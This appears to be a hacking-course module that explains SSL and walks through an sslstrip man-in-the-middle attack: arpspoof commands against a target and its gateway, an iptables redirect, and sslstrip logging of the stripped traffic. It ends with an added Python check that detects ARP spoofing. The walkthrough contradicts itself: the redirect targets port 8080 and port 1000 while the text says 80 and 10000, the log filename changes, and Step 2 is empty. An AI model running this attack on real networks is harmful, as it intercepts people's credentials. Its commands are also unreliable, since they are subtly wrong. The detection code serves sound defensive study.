MODULE 6:- Enumeration
What is SSL (secure socket layer)?
SSL (Secure Socket Layer) is a standard security technology used for establishing an encrypted channel between a server and a client. For example, a web server (website) and a browser, or a mail server and a mail client.
SSL allows sensitive information such as credit card numbers, social security numbers, and login credentials to be transmitted securely. Normally, data sent between browsers and web servers is sent in plain text, leaving you vulnerable to eavesdropping. If an attacker is able to intercept (capture) the data being sent over the internet between a browser and a web server, they can see and use that information. HTTP sends data in plain text over the network. The HTTPS protocol is used for establishing a secure channel between the browser (client) and the web server.
More specifically, SSL is a security protocol. Protocols describe how algorithms should be used; in this case, the SSL protocol determines variables of the encryption for both the link and the data being transmitted.
More detail: https://www.digicert.com/ssl.htm
sslstrip is a tool used to downgrade HTTPS to HTTP. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
How does sslstrip work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send the attacker all of its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
Step 1: Enable port forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
Step 2: Find out the network gateway
Step 3: Spoof MAC address with gateway MAC address using arpspoof
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
Open a new terminal and run the following command
arpspoof -i eth0 -t 192.168.1.1 192.168.1.5
Step 4: Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port 1000
Step 5: Write the results to a file (-w sslstrip.log), listening on port 1000 (-l 1000):
sslstrip -w sslstrip.txt -l 1000
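On the defending side, the ARP step above leaves a trace on the target host: its gateway entry changes MAC address and ends up sharing that MAC with another IP on the segment. The Python check below is an added example, not part of the original page or of sslstrip; it parses text in Linux /proc/net/arp format, and the sample table, the MAC addresses, the 192.168.1.66 host and the function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample in Linux /proc/net/arp format, as it could look on host
# 192.168.1.5 while its gateway entry (192.168.1.1) is spoofed. MACs are made up.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:aa:bb:66     *        eth0
192.168.1.66     0x1         0x2         02:00:00:AA:BB:66     *        eth0
192.168.1.20     0x1         0x2         02:00:00:11:22:33     *        eth0
192.168.1.30     0x1         0x0         00:00:00:00:00:00     *        eth0
"""

def parse_arp_table(text):
    """Return (ip, mac, device) for resolved entries; skip header and incomplete rows."""
    entries = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, device = fields
        if int(flags, 16) & 0x2 == 0 or mac == "00:00:00:00:00:00":
            continue  # ATF_COM (0x2) not set: the entry never resolved
        entries.append((ip, mac.lower(), device))
    return entries

def find_arp_anomalies(text, gateway_ip, known_gateway_mac=None):
    """Report a gateway MAC that differs from a recorded one, and MACs claimed by several IPs."""
    findings = []
    ips_by_mac = defaultdict(set)
    for ip, mac, device in parse_arp_table(text):
        ips_by_mac[(device, mac)].add(ip)
        if ip == gateway_ip and known_gateway_mac and mac != known_gateway_mac.lower():
            findings.append(("gateway_mac_changed", ip, mac))
    for (_device, mac), ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            kind = "gateway_shares_mac" if gateway_ip in ips else "duplicate_mac"
            findings.append((kind, ",".join(sorted(ips)), mac))
    return findings

if __name__ == "__main__":
    # 02:00:00:00:00:01 stands in for the router's real MAC, recorded beforehand.
    for finding in find_arp_anomalies(SAMPLE_ARP_TABLE, "192.168.1.1", "02:00:00:00:00:01"):
        print(finding)
```

A shared MAC can also be legitimate (proxy ARP, one host holding several addresses), so a gateway_shares_mac finding should be confirmed against the router's real MAC before acting on it.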